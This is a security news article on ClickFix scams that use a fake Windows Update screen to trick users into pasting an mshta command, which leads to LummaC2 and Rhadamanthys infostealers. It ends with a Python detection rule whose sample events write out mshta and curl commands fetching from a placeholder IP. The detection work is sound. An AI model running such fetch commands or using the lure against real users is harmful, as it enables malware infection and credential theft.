Attackers are Using Fake Windows Updates in ClickFix Scams
<p>Threat actors are using a twist on the ClickFix attack model, in this case hiding the malicious code they want victims to download in a convincing – but fake – Windows Update screen, complete with white lettering against a bright blue background.</p><p>“This newer variant mimics the blue Windows Update splash page in full-screen, displaying realistic ‘Working on updates’ animations that eventually conclude by prompting the user to follow the standard ClickFix pattern: Open the Run prompt (Win+R), then paste and run the malicious command,” Huntress security researchers Ben Folland and Anna Pham <a href="https://www.huntress.com/blog/clickfix-malware-buried-in-images" target="_blank" rel="noopener">wrote in a report</a> this week.</p><p>Doing so kicks off a series of steps that eventually lead to installing the LummaC2 and Rhadamanthys info-stealing malware.</p><p>A ClickFix is a relatively new but increasingly popular social engineering scam in which victims are duped into manually executing malicious commands on their systems, leading to malware, including ransomware, being deployed and allowing the bad actors to bypass protections.</p><p>Security researchers with Microsoft in August wrote about the <a href="https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/#:~:text=protection%20and%20detection-,The%20ClickFix%20attack%20chain,conventional%20and%20automated%20security%20solutions." target="_blank" rel="noopener">growing use of ClickFix scams</a> by cybercriminals, noting that there are “campaigns targeting thousands of enterprise and end-user devices globally every day. 
Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware.”</p><h3>Rapid Rise in ClickFix Campaigns</h3><p>In June, cybersecurity company ESET noted in a <a href="https://www.welivesecurity.com/en/eset-research/eset-threat-report-h1-2025/" target="_blank" rel="noopener">report</a> about the threat landscape in the first half of the year that “one of the most striking developments this period was the emergence of ClickFix, a new, deceptive attack vector that skyrocketed by over 500% compared to [the second half of] 2024 in ESET telemetry. This makes it one of the most rapidly rising threats, accounting for nearly 8% of all blocked attacks in H1 2025, and is now the second most common attack vector after phishing.”</p><p>“The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors,” Jiří Kropáč, director of ESET’s Threat Prevention Labs, <a href="https://www.eset.com/us/about/newsroom/research/eset-threat-report-clickfix-fake-error-surges-spreads-ransomware-and-other-malware/?srsltid=AfmBOorwGQCjg70fwuiGi-oa6j4AnocU5FNRM7HJAhGLqx9xhxN6WV4i&srsltid=AfmBOopk6qMXd6IlPQlFpcE3ZbZCaTsDB-defMbO2TOMK24TkO0XGLnb" target="_blank" rel="noopener">said in a statement</a>.</p><h3>Dropping LummaC2, Rhadamanthys Infostealers</h3><p>In the campaign tracked by Huntress, two ClickFix lures used a steganographic loader to deliver the LummaC2 and Rhadamanthys infostealers. In steganographic ClickFix scams, the malicious code is hidden within the pixel data of image files; the goal, again, is to trick the user into running the malicious commands.</p><p>One variant used a human verification page as the lure, the researchers wrote. 
The other variant featured the Windows Update page.</p><h3>Looks Like the Real Thing</h3><p>They wrote that since the beginning of October, they’ve been tracking several ClickFix clusters using the Windows Update ploy, aimed at convincing victims that a Windows update cycle has started. The message fills the entire screen and displays what Folland and Pham said is a “genuine-looking Windows Update screen.”</p><p>The page includes the familiar instruction not to turn off the computer while the updates are being installed and shows the user the progress of the updates.</p><p>“At the end of the ‘update,’ users are encouraged to follow the regular Win+R &amp; Ctrl+V pattern to paste a malicious command,” they wrote, adding that the execution chain is the same as the one used with the human verification variant.</p><p>“This starts with an mshta.exe command that contains a URL where the 2nd octet is always hex-encoded,” the researchers wrote. “This leads to the execution of PowerShell, which dynamically decrypts and loads a reflective .NET assembly that, in turn, loads another .NET assembly used for process injection. The shellcode injected into the target process is extracted using steganography.”</p><h3>Finding the Payloads</h3><p>The infostealer payload extracted from the image is wrapped with Donut, a loader that enables in-memory execution of VBScript, JScript, EXE, DLL files, and .NET assemblies. Using a donut-decryptor tool, the researchers were able to confirm that the payloads were the LummaC2 and Rhadamanthys infostealers.</p><p>Earlier this month, law enforcement agencies in Europe took down the infrastructure used by threat actors to deploy a number of malware families, including Rhadamanthys, as part of the ongoing international Operation Endgame. 
Folland and Pham noted that their research was done before and after the law enforcement action and that Rhadamanthys is no longer being delivered in the fake Windows Update campaign.</p><p>“Ultimately, while the use of steganography helps these payloads evade signature-based detection and complicates analysis, the attacks rely on a simple delivery mechanism: the victim manually opening the Windows Run box to paste a malicious command,” they wrote.</p>
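<p>As an added example (not code from the Huntress report or from this article), the following Python detection rule turns the indicator quoted above, mshta.exe handed a URL whose second octet is hex-encoded, into a check over process-creation events and decodes the host to dotted-decimal form for blocklist matching. The Sysmon-style event fields, the sample addresses (TEST-NET-2 range) and the explorer.exe-parent heuristic for Run-dialog (Win+R) launches are assumptions of this example.</p>

```python
import re
from typing import Optional

# Sysmon-style process-creation events, constructed for this example (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://198.0x33.100.7/update"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe "C:\\Users\\Public\\readme.hta"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl http://198.0x33.100.7/x"},
]

DEC_OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
HEX_OCTET = r"0[xX][0-9a-fA-F]{1,2}"
# IPv4 literal host whose second octet is written in hex, the pattern quoted from the report.
MIXED_HOST_RE = re.compile(
    rf"https?://({DEC_OCTET})\.({HEX_OCTET})\.({DEC_OCTET})\.({DEC_OCTET})(?::\d+)?(?:/\S*)?"
)
# mshta invoked by bare name or full path, as either "mshta" or "mshta.exe".
MSHTA_RE = re.compile(r"(?:^|[\s\"'\\])mshta(?:\.exe)?(?=[\s\"']|$)", re.IGNORECASE)

def canonical_ip(o1: str, hex_o2: str, o3: str, o4: str) -> str:
    """Decode the hex octet so the host can be matched against dotted-decimal blocklists."""
    return f"{o1}.{int(hex_o2, 16)}.{o3}.{o4}"

def flag_mshta_event(event: dict) -> Optional[dict]:
    """Return a finding when mshta.exe is handed a URL with a hex-encoded second octet."""
    cmd = event.get("CommandLine", "")
    if not MSHTA_RE.search(cmd):
        return None
    m = MIXED_HOST_RE.search(cmd)
    if not m:
        return None
    return {
        "command": cmd,
        "url": m.group(0),
        "resolved_host": canonical_ip(*m.groups()),
        # Run-dialog (Win+R) launches are children of explorer.exe; heuristic added by this example.
        "via_run_dialog": event.get("ParentImage", "").lower().endswith(r"\explorer.exe"),
    }

def scan(events: list) -> list:
    return [f for f in (flag_mshta_event(e) for e in events) if f]
```

Only the first constructed event is flagged: the local .hta launch has no URL, and the curl event is not mshta, so a plain-decimal or non-mshta fetch is left to other rules.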